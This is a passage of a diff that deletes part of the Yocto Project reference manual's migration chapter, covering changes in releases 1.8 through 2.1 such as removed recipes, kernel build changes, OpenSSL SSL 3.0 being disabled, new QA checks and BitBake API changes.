-                    For information on the build history feature, see the
-                    "<ulink url='&YOCTO_DOCS_DEV_URL;#maintaining-build-output-quality'>Maintaining Build Output Quality</ulink>"
-                    section in the Yocto Project Development Tasks Manual.
-                    </para></listitem>
-            </itemizedlist>
-        </para>
-    </section>
-</section>
-
-<section id='moving-to-the-yocto-project-1.8-release'>
-    <title>Moving to the Yocto Project 1.8 Release</title>
-
-    <para>
-        This section provides migration information for moving to the
-        Yocto Project 1.8 Release from the prior release.
-    </para>
-
-    <section id='migration-1.8-removed-recipes'>
-        <title>Removed Recipes</title>
-
-        <para>
-            The following recipes have been removed:
-            <itemizedlist>
-                <listitem><para><filename>owl-video</filename>:
-                    Functionality replaced by <filename>gst-player</filename>.
-                    </para></listitem>
-                <listitem><para><filename>gaku</filename>:
-                    Functionality replaced by <filename>gst-player</filename>.
-                    </para></listitem>
-                <listitem><para><filename>gnome-desktop</filename>:
-                    This recipe is now available in
-                    <filename>meta-gnome</filename> and is no longer needed.
-                    </para></listitem>
-                <listitem><para><filename>gsettings-desktop-schemas</filename>:
-                    This recipe is now available in
-                    <filename>meta-gnome</filename> and is no longer needed.
-                    </para></listitem>
-                <listitem><para><filename>python-argparse</filename>:
-                    The <filename>argparse</filename> module is already
-                    provided in the default Python distribution in a
-                    package named <filename>python-argparse</filename>.
-                    Consequently, the separate
-                    <filename>python-argparse</filename> recipe is no
-                    longer needed.
-                    </para></listitem>
-                <listitem><para><filename>telepathy-python, libtelepathy, telepathy-glib, telepathy-idle, telepathy-mission-control</filename>:
-                    All these recipes have moved to
-                    <filename>meta-oe</filename> and are consequently no
-                    longer needed by any recipes in OpenEmbedded-Core.
-                    </para></listitem>
-                <listitem><para><filename>linux-yocto_3.10</filename> and <filename>linux-yocto_3.17</filename>:
-                    Support for the linux-yocto 3.10 and 3.17 kernels has been
-                    dropped.
-                    Support for the 3.14 kernel remains, while support for
-                    3.19 kernel has been added.
-                    </para></listitem>
-                <listitem><para><filename>poky-feed-config-opkg</filename>:
-                    This recipe has become obsolete and is no longer needed.
-                    Use <filename>distro-feed-config</filename> from
-                    <filename>meta-oe</filename> instead.
-                    </para></listitem>
-                <listitem><para><filename>libav 0.8.x</filename>:
-                    <filename>libav 9.x</filename> is now used.
-                    </para></listitem>
-                <listitem><para><filename>sed-native</filename>:
-                    No longer needed.
-                    A working version of <filename>sed</filename> is expected
-                    to be provided by the host distribution.
-                    </para></listitem>
-            </itemizedlist>
-        </para>
-    </section>
-
-    <section id='migration-1.8-bluez'>
-        <title>BlueZ 4.x / 5.x Selection</title>
-
-        <para>
-            Proper built-in support for selecting BlueZ 5.x in preference
-            to the default of 4.x now exists.
-            To use BlueZ 5.x, simply add "bluez5" to your
-            <link linkend='var-DISTRO_FEATURES'><filename>DISTRO_FEATURES</filename></link>
-            value.
-            If you had previously added append files
-            (<filename>*.bbappend</filename>) to make this selection, you can
-            now remove them.
-        </para>
-
-        <para>
-            Additionally, a <filename>bluetooth</filename> class has been added
-            to make selection of the appropriate bluetooth support within a
-            recipe a little easier.
-            If you wish to make use of this class in a recipe, add something
-            such as the following:
-            <literallayout class='monospaced'>
-     inherit bluetooth
-     PACKAGECONFIG ??= "${@bb.utils.contains('DISTRO_FEATURES', 'bluetooth', '${BLUEZ}', '', d)}"
-     PACKAGECONFIG[bluez4] = "--enable-bluetooth,--disable-bluetooth,bluez4"
-     PACKAGECONFIG[bluez5] = "--enable-bluez5,--disable-bluez5,bluez5"
-            </literallayout>
-        </para>
-    </section>
-
-    <section id='migration-1.8-kernel-build-changes'>
-        <title>Kernel Build Changes</title>
-
-        <para>
-            The kernel build process was changed to place the source
-            in a common shared work area and to place build artifacts
-            separately in the source code tree.
-            In theory, migration paths have been provided for most common
-            usages in kernel recipes but this might not work in all cases.
-            In particular, users need to ensure that
-            <filename>${S}</filename> (source files) and
-            <filename>${B}</filename> (build artifacts) are used
-            correctly in functions such as
-            <link linkend='ref-tasks-configure'><filename>do_configure</filename></link>
-            and
-            <link linkend='ref-tasks-install'><filename>do_install</filename></link>.
-            For kernel recipes that do not inherit from
-            <filename>kernel-yocto</filename> or include
-            <filename>linux-yocto.inc</filename>, you might wish to
-            refer to the <filename>linux.inc</filename> file in the
-            <filename>meta-oe</filename> layer for the kinds of changes you
-            need to make.
-            For reference, here is the
-            <ulink url='http://cgit.openembedded.org/meta-openembedded/commit/meta-oe/recipes-kernel/linux/linux.inc?id=fc7132ede27ac67669448d3d2845ce7d46c6a1ee'>commit</ulink>
-            where the <filename>linux.inc</filename> file in
-            <filename>meta-oe</filename> was updated.
-        </para>
-
-        <para>
-            Recipes that rely on the kernel source code and do not inherit
-            the module classes might need to add explicit dependencies on
-            the <filename>do_shared_workdir</filename> kernel task, for example:
-            <literallayout class='monospaced'>
-     do_configure[depends] += "virtual/kernel:do_shared_workdir"
-            </literallayout>
-        </para>
-    </section>
-
-    <section id='migration-1.8-ssl'>
-        <title>SSL 3.0 is Now Disabled in OpenSSL</title>
-
-        <para>
-            SSL 3.0 is now disabled when building OpenSSL.
-            Disabling SSL 3.0 avoids any lingering instances of the POODLE
-            vulnerability.
-            If you feel you must re-enable SSL 3.0, then you can add an
-            append file (<filename>*.bbappend</filename>) for the
-            <filename>openssl</filename> recipe to remove "-no-ssl3"
-            from
-            <link linkend='var-EXTRA_OECONF'><filename>EXTRA_OECONF</filename></link>.
-        </para>
-    </section>
-
-    <section id='migration-1.8-default-sysroot-poisoning'>
-        <title>Default Sysroot Poisoning</title>
-
-        <para>
-            <filename>gcc's</filename> default sysroot and include directories
-            are now "poisoned".
-            In other words, the sysroot and include directories are being
-            redirected to a non-existent location in order to catch when
-            host directories are being used due to the correct options not
-            being passed.
-            This poisoning applies both to the cross-compiler used within the
-            build and to the cross-compiler produced in the SDK.
-        </para>
-
-        <para>
-            If this change causes something in the build to fail, it almost
-            certainly means the various compiler flags and commands are not
-            being passed correctly to the underlying piece of software.
-            In such cases, you need to take corrective steps.
-        </para>
-    </section>
-
-    <section id='migration-1.8-rebuild-improvements'>
-        <title>Rebuild Improvements</title>
-
-        <para>
-            Changes have been made to the
-            <link linkend='ref-classes-base'><filename>base</filename></link>,
-            <link linkend='ref-classes-autotools'><filename>autotools</filename></link>,
-            and
-            <link linkend='ref-classes-cmake'><filename>cmake</filename></link>
-            classes to clean out generated files when the
-            <link linkend='ref-tasks-configure'><filename>do_configure</filename></link>
-            task needs to be re-executed.
-        </para>
-
-        <para>
-            One of the improvements is to attempt to run "make clean" during
-            the <filename>do_configure</filename> task if a
-            <filename>Makefile</filename> exists.
-            Some software packages do not provide a working clean target
-            within their make files.
-            If you have such recipes, you need to set
-            <link linkend='var-CLEANBROKEN'><filename>CLEANBROKEN</filename></link>
-            to "1" within the recipe, for example:
-            <literallayout class='monospaced'>
-     CLEANBROKEN = "1"
-            </literallayout>
-        </para>
-    </section>
-
-    <section id='migration-1.8-qa-check-and-validation-changes'>
-        <title>QA Check and Validation Changes</title>
-
-        <para>
-            The following QA Check and Validation Changes have occurred:
-            <itemizedlist>
-                <listitem><para>
-                    Usage of <filename>PRINC</filename>
-                    previously triggered a warning.
-                    It now triggers an error.
-                    You should remove any remaining usage of
-                    <filename>PRINC</filename> in any recipe or append file.
-                    </para></listitem>
-                <listitem><para>
-                    An additional QA check has been added to detect usage of
-                    <filename>${D}</filename> in
-                    <link linkend='var-FILES'><filename>FILES</filename></link>
-                    values where
-                    <link linkend='var-D'><filename>D</filename></link> values
-                    should not be used at all.
-                    The same check ensures that <filename>$D</filename> is used
-                    in
-                    <filename>pkg_preinst/pkg_postinst/pkg_prerm/pkg_postrm</filename>
-                    functions instead of <filename>${D}</filename>.
-                    </para></listitem>
-                <listitem><para>
-                    <link linkend='var-S'><filename>S</filename></link> now
-                    needs to be set to a valid value within a recipe.
-                    If <filename>S</filename> is not set in the recipe, the
-                    directory is not automatically created.
-                    If <filename>S</filename> does not point to a directory
-                    that exists at the time the
-                    <link linkend='ref-tasks-unpack'><filename>do_unpack</filename></link>
-                    task finishes, a warning will be shown.
-                    </para></listitem>
-                <listitem><para>
-                    <link linkend='var-LICENSE'><filename>LICENSE</filename></link>
-                    is now validated for correct formatting of multiple
-                    licenses.
-                    If the format is invalid (e.g. multiple licenses are
-                    specified with no operators to specify how the multiple
-                    licenses interact), then a warning will be shown.
-                    </para></listitem>
-            </itemizedlist>
-        </para>
-    </section>
-
-    <section id='migration-1.8-miscellaneous-changes'>
-        <title>Miscellaneous Changes</title>
-
-        <para>
-            The following miscellaneous changes have occurred:
-            <itemizedlist>
-                <listitem><para>
-                    The <filename>send-error-report</filename> script now
-                    expects a "-s" option to be specified before the server
-                    address.
-                    This assumes a server address is being specified.
-                    </para></listitem>
-                <listitem><para>
-                    The <filename>oe-pkgdata-util</filename> script now
-                    expects a "-p" option to be specified before the
-                    <filename>pkgdata</filename> directory, which is now
-                    optional.
-                    If the <filename>pkgdata</filename> directory is not
-                    specified, the script will run BitBake to query
-                    <link linkend='var-PKGDATA_DIR'><filename>PKGDATA_DIR</filename></link>
-                    from the build environment.
-                    </para></listitem>
-            </itemizedlist>
-        </para>
-    </section>
-</section>
-
-<section id='moving-to-the-yocto-project-2.0-release'>
-    <title>Moving to the Yocto Project 2.0 Release</title>
-
-    <para>
-        This section provides migration information for moving to the
-        Yocto Project 2.0 Release from the prior release.
-    </para>
-
-    <section id='migration-2.0-gcc-5'>
-        <title>GCC 5</title>
-
-        <para>
-            The default compiler is now GCC 5.2.
-            This change has required fixes for compilation errors in a number
-            of other recipes.
-        </para>
-
-        <para>
-            One important example is a fix for when the Linux kernel freezes at
-            boot time on ARM when built with GCC 5.
-            If you are using your own kernel recipe or source tree and
-            building for ARM, you will likely need to apply this
-            <ulink url='https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit?id=a077224fd35b2f7fbc93f14cf67074fc792fbac2'>patch</ulink>.
-            The standard <filename>linux-yocto</filename> kernel source tree
-            already has a workaround for the same issue.
-        </para>
-
-        <para>
-            For further details, see
-            <ulink url='https://gcc.gnu.org/gcc-5/changes.html'></ulink> and
-            the porting guide at
-            <ulink url='https://gcc.gnu.org/gcc-5/porting_to.html'></ulink>.
-        </para>
-
-        <para>
-            Alternatively, you can switch back to GCC 4.9 or 4.8 by
-            setting <filename>GCCVERSION</filename> in your configuration,
-            as follows:
-            <literallayout class='monospaced'>
-     GCCVERSION = "4.9%"
-            </literallayout>
-        </para>
-    </section>
-
-    <section id='migration-2.0-Gstreamer-0.10-removed'>
-        <title>Gstreamer 0.10 Removed</title>
-
-        <para>
-            Gstreamer 0.10 has been removed in favor of Gstreamer 1.x.
-            As part of the change, recipes for Gstreamer 0.10 and related
-            software are now located
-            in <filename>meta-multimedia</filename>.
-            This change results in Qt4 having Phonon and Gstreamer
-            support in QtWebkit disabled by default.
-        </para>
-    </section>
-
-    <section id='migration-2.0-removed-recipes'>
-        <title>Removed Recipes</title>
-
-        <para>
-            The following recipes have been moved or removed:
-            <itemizedlist>
-                <listitem><para>
-                    <filename>bluez4</filename>: The recipe is obsolete and
-                    has been moved due to <filename>bluez5</filename>
-                    becoming fully integrated.
-                    The <filename>bluez4</filename> recipe now resides in
-                    <filename>meta-oe</filename>.
-                    </para></listitem>
-                <listitem><para>
-                    <filename>gamin</filename>: The recipe is obsolete and
-                    has been removed.
-                    </para></listitem>
-                <listitem><para>
-                    <filename>gnome-icon-theme</filename>: The recipe's
-                    functionally has been replaced by
-                    <filename>adwaita-icon-theme</filename>.
-                    </para></listitem>
-                <listitem><para>
-                    Gstreamer 0.10 Recipes: Recipes for Gstreamer 0.10 have
-                    been removed in favor of the recipes for Gstreamer 1.x.
-                    </para></listitem>
-                <listitem><para>
-                    <filename>insserv</filename>: The recipe is obsolete and
-                    has been removed.
-                    </para></listitem>
-                <listitem><para>
-                    <filename>libunique</filename>: The recipe is no longer
-                    used and has been moved to <filename>meta-oe</filename>.
-                    </para></listitem>
-                <listitem><para>
-                    <filename>midori</filename>: The recipe's functionally
-                    has been replaced by <filename>epiphany</filename>.
-                    </para></listitem>
-                <listitem><para>
-                    <filename>python-gst</filename>: The recipe is obsolete
-                    and has been removed since it only contains bindings for
-                    Gstreamer 0.10.
-                    </para></listitem>
-                <listitem><para>
-                    <filename>qt-mobility</filename>: The recipe is obsolete and
-                    has been removed since it requires
-                    <filename>Gstreamer 0.10</filename>, which has been
-                    replaced.
-                    </para></listitem>
-                <listitem><para>
-                    <filename>subversion</filename>: All 1.6.x versions of this
-                    recipe have been removed.
-                    </para></listitem>
-                <listitem><para>
-                    <filename>webkit-gtk</filename>: The older 1.8.3 version
-                    of this recipe has been removed in favor of
-                    <filename>webkitgtk</filename>.
-                    </para></listitem>
-            </itemizedlist>
-        </para>
-    </section>
-
-    <section id='migration-2.0-bitbake-datastore-improvements'>
-        <title>BitBake datastore improvements</title>
-
-        <para>
-            The method by which BitBake's datastore handles overrides has
-            changed.
-            Overrides are now applied dynamically and
-            <filename>bb.data.update_data()</filename> is now a no-op.
-            Thus, <filename>bb.data.update_data()</filename> is no longer
-            required in order to apply the correct overrides.
-            In practice, this change is unlikely to require any changes to
-            Metadata.
-            However, these minor changes in behavior exist:
-            <itemizedlist>
-                <listitem><para>
-                    All potential overrides are now visible in the variable
-                    history as seen when you run the following:
-                    <literallayout class='monospaced'>
-     $ bitbake -e
-                    </literallayout>
-                    </para></listitem>
-                <listitem><para>
-                    <filename>d.delVar('</filename><replaceable>VARNAME</replaceable><filename>')</filename> and
-                    <filename>d.setVar('</filename><replaceable>VARNAME</replaceable><filename>', None)</filename>
-                    result in the variable and all of its overrides being
-                    cleared out.
-                    Before the change, only the non-overridden values
-                    were cleared.
-                    </para></listitem>
-            </itemizedlist>
-        </para>
-    </section>
-
-    <section id='migration-2.0-shell-message-function-changes'>
-        <title>Shell Message Function Changes</title>
-
-        <para>
-            The shell versions of the BitBake message functions (i.e.
-            <filename>bbdebug</filename>, <filename>bbnote</filename>,
-            <filename>bbwarn</filename>, <filename>bbplain</filename>,
-            <filename>bberror</filename>, and <filename>bbfatal</filename>)
-            are now connected through to their BitBake equivalents
-            <filename>bb.debug()</filename>, <filename>bb.note()</filename>,
-            <filename>bb.warn()</filename>, <filename>bb.plain()</filename>,
-            <filename>bb.error()</filename>, and
-            <filename>bb.fatal()</filename>, respectively.
-            Thus, those message functions that you would expect to be printed
-            by the BitBake UI are now actually printed.
-            In practice, this change means two things:
-            <itemizedlist>
-                <listitem><para>
-                    If you now see messages on the console that you did not
-                    previously see as a result of this change, you might
-                    need to clean up the calls to
-                    <filename>bbwarn</filename>, <filename>bberror</filename>,
-                    and so forth.
-                    Or, you might want to simply remove the calls.
-                    </para></listitem>
-                <listitem><para>
-                    The <filename>bbfatal</filename> message function now
-                    suppresses the full error log in the UI, which means any
-                    calls to <filename>bbfatal</filename> where you still
-                    wish to see the full error log should be replaced by
-                    <filename>die</filename> or
-                    <filename>bbfatal_log</filename>.
-                    </para></listitem>
-            </itemizedlist>
-        </para>
-    </section>
-
-    <section id='migration-2.0-extra-development-debug-package-cleanup'>
-        <title>Extra Development/Debug Package Cleanup</title>
-
-        <para>
-            The following recipes have had extra
-            <filename>dev/dbg</filename> packages removed:
-            <itemizedlist>
-                <listitem><para>
-                    <filename>acl</filename>
-                    </para></listitem>
-                <listitem><para>
-                    <filename>apmd</filename>
-                    </para></listitem>
-                <listitem><para>
-                    <filename>aspell</filename>
-                    </para></listitem>
-                <listitem><para>
-                    <filename>attr</filename>
-                    </para></listitem>
-                <listitem><para>
-                    <filename>augeas</filename>
-                    </para></listitem>
-                <listitem><para>
-                    <filename>bzip2</filename>
-                    </para></listitem>
-                <listitem><para>
-                    <filename>cogl</filename>
-                    </para></listitem>
-                <listitem><para>
-                    <filename>curl</filename>
-                    </para></listitem>
-                <listitem><para>
-                    <filename>elfutils</filename>
-                    </para></listitem>
-                <listitem><para>
-                    <filename>gcc-target</filename>
-                    </para></listitem>
-                <listitem><para>
-                    <filename>libgcc</filename>
-                    </para></listitem>
-                <listitem><para>
-                    <filename>libtool</filename>
-                    </para></listitem>
-                <listitem><para>
-                    <filename>libxmu</filename>
-                    </para></listitem>
-                <listitem><para>
-                    <filename>opkg</filename>
-                    </para></listitem>
-                <listitem><para>
-                    <filename>pciutils</filename>
-                    </para></listitem>
-                <listitem><para>
-                    <filename>rpm</filename>
-                    </para></listitem>
-                <listitem><para>
-                    <filename>sysfsutils</filename>
-                    </para></listitem>
-                <listitem><para>
-                    <filename>tiff</filename>
-                    </para></listitem>
-                <listitem><para>
-                    <filename>xz</filename>
-                    </para></listitem>
-            </itemizedlist>
-            All of the above recipes now conform to the standard packaging
-            scheme where a single <filename>-dev</filename>,
-            <filename>-dbg</filename>, and <filename>-staticdev</filename>
-            package exists per recipe.
-        </para>
-    </section>
-
-    <section id='migration-2.0-recipe-maintenance-tracking-data-moved-to-oe-core'>
-        <title>Recipe Maintenance Tracking Data Moved to OE-Core</title>
-
-        <para>
-            Maintenance tracking data for recipes that was previously part
-            of <filename>meta-yocto</filename> has been moved to
-            <link linkend='oe-core'>OE-Core</link>.
-            The change includes <filename>package_regex.inc</filename> and
-            <filename>distro_alias.inc</filename>, which are typically enabled
-            when using the <filename>distrodata</filename> class.
-            Additionally, the contents of
-            <filename>upstream_tracking.inc</filename> has now been split out
-            to the relevant recipes.
-        </para>
-    </section>
-
-    <section id='migration-2.0-automatic-stale-sysroot-file-cleanup'>
-        <title>Automatic Stale Sysroot File Cleanup</title>
-
-        <para>
-            Stale files from recipes that no longer exist in the current
-            configuration are now automatically removed from
-            sysroot as well as removed from
-            any other place managed by shared state.
-            This automatic cleanup means that the build system now properly
-            handles situations such as renaming the build system side of
-            recipes, removal of layers from
-            <filename>bblayers.conf</filename>, and
-            <link linkend='var-DISTRO_FEATURES'><filename>DISTRO_FEATURES</filename></link>
-            changes.
-        </para>
-
-        <para>
-            Additionally, work directories for old versions of recipes are
-            now pruned.
-            If you wish to disable pruning old work directories, you can set
-            the following variable in your configuration:
-            <literallayout class='monospaced'>
-     SSTATE_PRUNE_OBSOLETEWORKDIR = "0"
-            </literallayout>
-        </para>
-    </section>
-
-    <section id='migration-2.0-linux-yocto-kernel-metadata-repository-now-split-from-source'>
-        <title><filename>linux-yocto</filename> Kernel Metadata Repository Now Split from Source</title>
-
-        <para>
-            The <filename>linux-yocto</filename> tree has up to now been a
-            combined set of kernel changes and configuration (meta) data
-            carried in a single tree.
-            While this format is effective at keeping kernel configuration and
-            source modifications synchronized, it is not always obvious to
-            developers how to manipulate the Metadata as compared to the
-            source.
-        </para>
-
-        <para>
-            Metadata processing has now been removed from the
-            <link linkend='ref-classes-kernel-yocto'><filename>kernel-yocto</filename></link>
-            class and the external Metadata repository
-            <filename>yocto-kernel-cache</filename>, which has always been used
-            to seed the <filename>linux-yocto</filename> "meta" branch.
-            This separate <filename>linux-yocto</filename> cache repository
-            is now the primary location for this data.
-            Due to this change, <filename>linux-yocto</filename> is no longer
-            able to process combined trees.
-            Thus, if you need to have your own combined kernel repository,
-            you must do the split there as well and update your recipes
-            accordingly.
-            See the <filename>meta/recipes-kernel/linux/linux-yocto_4.1.bb</filename>
-            recipe for an example.
-        </para>
-    </section>
-
-    <section id='migration-2.0-additional-qa-checks'>
-        <title>Additional QA checks</title>
-
-        <para>
-            The following QA checks have been added:
-            <itemizedlist>
-                <listitem><para>
-                    Added a "host-user-contaminated" check for ownership
-                    issues for packaged files outside of
-                    <filename>/home</filename>.
-                    The check looks for files that are incorrectly owned by the
-                    user that ran BitBake instead of owned by a valid user in
-                    the target system.
-                    </para></listitem>
-                <listitem><para>
-                    Added an "invalid-chars" check for invalid (non-UTF8)
-                    characters in recipe metadata variable values
-                    (i.e.
-                    <link linkend='var-DESCRIPTION'><filename>DESCRIPTION</filename></link>,
-                    <link linkend='var-SUMMARY'><filename>SUMMARY</filename></link>,
-                    <link linkend='var-LICENSE'><filename>LICENSE</filename></link>,
-                    and
-                    <link linkend='var-SECTION'><filename>SECTION</filename></link>).
-                    Some package managers do not support these characters.
-                    </para></listitem>
-                <listitem><para>
-                    Added an "invalid-packageconfig" check for any options
-                    specified in
-                    <link linkend='var-PACKAGECONFIG'><filename>PACKAGECONFIG</filename></link>
-                    that do not match any <filename>PACKAGECONFIG</filename>
-                    option defined for the recipe.
-                    </para></listitem>
-            </itemizedlist>
-        </para>
-    </section>
-
-    <section id='migration-2.0-miscellaneous'>
-        <title>Miscellaneous Changes</title>
-
-        <para>
-            These additional changes exist:
-            <itemizedlist>
-                <listitem><para>
-                    <filename>gtk-update-icon-cache</filename> has been
-                    renamed to <filename>gtk-icon-utils</filename>.
-                    </para></listitem>
-                <listitem><para>
-                    The <filename>tools-profile</filename>
-                    <link linkend='var-IMAGE_FEATURES'><filename>IMAGE_FEATURES</filename></link>
-                    item as well as its corresponding packagegroup and
-                    <filename>packagegroup-core-tools-profile</filename> no
-                    longer bring in <filename>oprofile</filename>.
-                    Bringing in <filename>oprofile</filename> was originally
-                    added to aid compilation on resource-constrained
-                    targets.
-                    However, this aid has not been widely used and is not
-                    likely to be used going forward due to the more powerful
-                    target platforms and the existence of better
-                    cross-compilation tools.
-                    </para></listitem>
-                <listitem><para>
-                    The
-                    <link linkend='var-IMAGE_FSTYPES'><filename>IMAGE_FSTYPES</filename></link>
-                    variable's default value now specifies
-                    <filename>ext4</filename> instead of
-                    <filename>ext3</filename>.
-                    </para></listitem>
-                <listitem><para>
-                    All support for the <filename>PRINC</filename>
-                    variable has been removed.
-                    </para></listitem>
-                <listitem><para>
-                    The <filename>packagegroup-core-full-cmdline</filename>
-                    packagegroup no longer brings in
-                    <filename>lighttpd</filename> due to the fact that
-                    bringing in <filename>lighttpd</filename> is not really in
-                    line with the packagegroup's purpose, which is to add full
-                    versions of command-line tools that by default are
-                    provided by <filename>busybox</filename>.
-                    </para></listitem>
-            </itemizedlist>
-        </para>
-    </section>
-</section>
-
-<section id='moving-to-the-yocto-project-2.1-release'>
-    <title>Moving to the Yocto Project 2.1 Release</title>
-
-    <para>
-        This section provides migration information for moving to the
-        Yocto Project 2.1 Release from the prior release.
-    </para>
-
-    <section id='migration-2.1-variable-expansion-in-python-functions'>
-        <title>Variable Expansion in Python Functions</title>
-
-        <para>
-            Variable expressions, such as
-            <filename>${</filename><replaceable>VARNAME</replaceable><filename>}</filename>
-            no longer expand automatically within Python functions.
-            Suppressing expansion was done to allow Python functions to
-            construct shell scripts or other code for situations in which you
-            do not want such expressions expanded.
-            For any existing code that relies on these expansions, you need to
-            change the expansions to expand the value of individual
-            variables through <filename>d.getVar()</filename>.
-            To alternatively expand more complex expressions,
-            use <filename>d.expand()</filename>.
-        </para>
-    </section>
-
-    <section id='migration-2.1-overrides-must-now-be-lower-case'>
-        <title>Overrides Must Now be Lower-Case</title>
-
-        <para>
-            The convention for overrides has always been for them to be
-            lower-case characters.
-            This practice is now a requirement as BitBake's datastore now
-            assumes lower-case characters in order to give a slight performance
-            boost during parsing.
-            In practical terms, this requirement means that anything that ends
-            up in
-            <link linkend='var-OVERRIDES'><filename>OVERRIDES</filename></link>
-            must now appear in lower-case characters (e.g. values for
-            <filename>MACHINE</filename>, <filename>TARGET_ARCH</filename>,
-            <filename>DISTRO</filename>, and also recipe names if
-            <filename>_pn-</filename><replaceable>recipename</replaceable>
-            overrides are to be effective).
-        </para>
-    </section>
-
-    <section id='migration-2.1-expand-parameter-to-getvar-and-getvarflag-now-mandatory'>
-        <title>Expand Parameter to <filename>getVar()</filename> and
-            <filename>getVarFlag()</filename> is Now Mandatory</title>
-
-        <para>
-            The expand parameter to <filename>getVar()</filename> and
-            <filename>getVarFlag()</filename> previously defaulted to
-            False if not specified.
-            Now, however, no default exists so one must be specified.
-            You must change any <filename>getVar()</filename> calls that
-            do not specify the final expand parameter to calls that do specify
-            the parameter.
-            You can run the following <filename>sed</filename> command at the
-            base of a layer to make this change:
-            <literallayout class='monospaced'>
-     sed -e 's:\(\.getVar([^,()]*\)):\1, False):g' -i `grep -ril getVar *`
-     sed -e 's:\(\.getVarFlag([^,()]*, [^,()]*\)):\1, False):g' -i `grep -ril getVarFlag *`
-            </literallayout>
-            <note>
-                The reason for this change is that it prepares the way for
-                changing the default to True in a future Yocto Project release.
-                This future change is a much more sensible default than False.
-                However, the change needs to be made gradually as a sudden
-                change of the default would potentially cause side-effects
-                that would be difficult to detect.
-            </note>
-        </para>
-    </section>
-
-    <section id='migration-2.1-makefile-environment-changes'>
-        <title>Makefile Environment Changes</title>
-
-        <para>
-            <link linkend='var-EXTRA_OEMAKE'><filename>EXTRA_OEMAKE</filename></link>
-            now defaults to "" instead of "-e MAKEFLAGS=".
-            Setting <filename>EXTRA_OEMAKE</filename> to "-e MAKEFLAGS=" by
-            default was a historical accident that has required many classes
-            (e.g. <filename>autotools</filename>, <filename>module</filename>)
-            and recipes to override this default in order to work with
-            sensible build systems.
-            When upgrading to the release, you must edit any recipe that
-            relies upon this old default by either setting
-            <filename>EXTRA_OEMAKE</filename> back to "-e MAKEFLAGS=" or by
-            explicitly setting any required variable value overrides using
-            <filename>EXTRA_OEMAKE</filename>, which is typically only needed
-            when a Makefile sets a default value for a variable that is
-            inappropriate for cross-compilation using the "=" operator rather
-            than the "?=" operator.
-        </para>
-    </section>
-
-    <section id='migration-2.1-libexecdir-reverted-to-prefix-libexec'>
-        <title><filename>libexecdir</filename> Reverted to <filename>${prefix}/libexec</filename></title>
-
-        <para>
-            The use of <filename>${libdir}/${BPN}</filename> as
-            <filename>libexecdir</filename> is different as compared to all
-            other mainstream distributions, which either uses
-            <filename>${prefix}/libexec</filename> or
-            <filename>${libdir}</filename>.
-            The use is also contrary to the GNU Coding Standards
-            (i.e. <ulink url='https://www.gnu.org/prep/standards/html_node/Directory-Variables.html'></ulink>)
-            that suggest <filename>${prefix}/libexec</filename> and also
-            notes that any package-specific nesting should be done by the
-            package itself.
-            Finally, having <filename>libexecdir</filename> change between
-            recipes makes it very difficult for different recipes to invoke
-            binaries that have been installed into
-            <filename>libexecdir</filename>.
-            The Filesystem Hierarchy Standard
-            (i.e. <ulink url='http://refspecs.linuxfoundation.org/FHS_3.0/fhs/ch04s07.html'></ulink>)
-            now recognizes the use of <filename>${prefix}/libexec/</filename>,
-            giving distributions the choice between
-            <filename>${prefix}/lib</filename> or
-            <filename>${prefix}/libexec</filename> without breaking FHS.
-        </para>
-    </section>
-
-    <section id='migration-2.1-ac-cv-sizeof-off-t-no-longer-cached-in-site-files'>
-        <title><filename>ac_cv_sizeof_off_t</filename> is No Longer Cached in Site Files</title>
-
-        <para>
-            For recipes inheriting the
-            <link linkend='ref-classes-autotools'><filename>autotools</filename></link>
-            class, <filename>ac_cv_sizeof_off_t</filename> is no longer cached
-            in the site files for <filename>autoconf</filename>.
-            The reason for this change is because the
-            <filename>ac_cv_sizeof_off_t</filename> value is not necessarily
-            static per architecture as was previously assumed.
-            Rather, the value changes based on whether large file support is
-            enabled.
-            For most software that uses <filename>autoconf</filename>, this
-            change should not be a problem.
-            However, if you have a recipe that bypasses the standard
-            <link linkend='ref-tasks-configure'><filename>do_configure</filename></link>
-            task from the <filename>autotools</filename> class and the software
-            the recipe is building uses a very old version of
-            <filename>autoconf</filename>, the recipe might be incapable of
-            determining the correct size of <filename>off_t</filename> during
-            <filename>do_configure</filename>.
-        </para>
-
-        <para>
-            The best course of action is to patch the software as necessary
-            to allow the default implementation from the
-            <filename>autotools</filename> class to work such that
-            <filename>autoreconf</filename> succeeds and produces a working
-            configure script, and to remove the
-            overridden <filename>do_configure</filename> task such that the
-            default implementation does get used.
-        </para>
-    </section>
-
-    <section id='migration-2.1-image-generation-split-out-from-filesystem-generation'>
-        <title>Image Generation is Now Split Out from Filesystem Generation</title>
-
-        <para>
-            Previously, for image recipes the
-            <link linkend='ref-tasks-rootfs'><filename>do_rootfs</filename></link>
-            task assembled the filesystem and then from that filesystem
-            generated images.
-            With this Yocto Project release, image generation is split into
-            separate
-            <link linkend='ref-tasks-image'><filename>do_image_*</filename></link>
-            tasks for clarity both in operation and in the code.
-        </para>
-
-        <para>
-            For most cases, this change does not present any problems.
-            However, if you have made customizations that directly modify the
-            <filename>do_rootfs</filename> task or that mention
-            <filename>do_rootfs</filename>, you might need to update those
-            changes.
-            In particular, if you had added any tasks after
-            <filename>do_rootfs</filename>, you should make edits so that
-            those tasks are after the
-            <link linkend='ref-tasks-image-complete'><filename>do_image_complete</filename></link>
-            task rather than after <filename>do_rootfs</filename>
-            so that the your added tasks
-            run at the correct time.
-        </para>
-
-        <para>
-            A minor part of this restructuring is that the post-processing
-            definitions and functions have been moved from the
-            <link linkend='ref-classes-image'><filename>image</filename></link>
-            class to the
-            <link linkend='ref-classes-rootfs*'><filename>rootfs-postcommands</filename></link>
-            class.
-            Functionally, however, they remain unchanged.
-        </para>
-    </section>
-
-    <section id='migration-2.1-removed-recipes'>
-        <title>Removed Recipes</title>
-
-        <para>
-            The following recipes have been removed in the 2.1 release:
-            <itemizedlist>
-                <listitem><para><filename>gcc</filename> version 4.8:
-                    Versions 4.9 and 5.3 remain.
-                    </para></listitem>
-                <listitem><para><filename>qt4</filename>:
-                    All support for Qt 4.x has been moved out to a separate
-                    <filename>meta-qt4</filename> layer because Qt 4 is no
-                    longer supported upstream.
-                    </para></listitem>
-                <listitem><para><filename>x11vnc</filename>:
-                    Moved to the <filename>meta-oe</filename> layer.
-                    </para></listitem>
-                <listitem><para><filename>linux-yocto-3.14</filename>:
-                    No longer supported.
-                    </para></listitem>
-                <listitem><para><filename>linux-yocto-3.19</filename>:
-                    No longer supported.
-                    </para></listitem>
-                <listitem><para><filename>libjpeg</filename>:
-                    Replaced by the <filename>libjpeg-turbo</filename> recipe.
-                    </para></listitem>
